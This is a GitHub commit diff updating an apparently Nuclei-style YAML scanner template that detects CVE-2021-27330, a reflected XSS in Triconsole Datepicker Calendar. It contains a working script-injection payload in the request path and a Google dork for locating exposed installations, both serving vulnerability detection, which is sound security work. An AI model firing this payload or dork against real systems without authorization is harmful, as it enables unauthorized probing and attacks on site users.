Merge pull request #4408 from daffainfo/patch-23

Update CVE-2021-27330
patch-1
Prince Chaddha 2022-05-17 12:34:56 +05:30 committed by GitHub
commit 0deea2ce88
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 8 deletions

View File

@ -2,12 +2,16 @@ id: CVE-2021-27330
info:
name: Triconsole 3.75 XSS
author: pikpikcu
author: pikpikcu,daffainfo
severity: medium
description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further
attacks such as reading browser history, directory listings, and file contents.
description: |
Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
reference:
- https://www.exploit-db.com/exploits/49597
- https://nvd.nist.gov/vuln/detail/CVE-2021-27330
metadata:
verified: true
google-dork: intitle:TriConsole.com - PHP Calendar Date Picker
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -18,19 +22,21 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
- '{{BaseURL}}/calendar/calendar_form.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
words:
- '<script>alert(document.domain)</script>'
- '<title>TriConsole.com - PHP Calendar Date Picker</title>'
condition: and
- type: word
part: header
words:
- "text/html"
part: header
- type: status
status: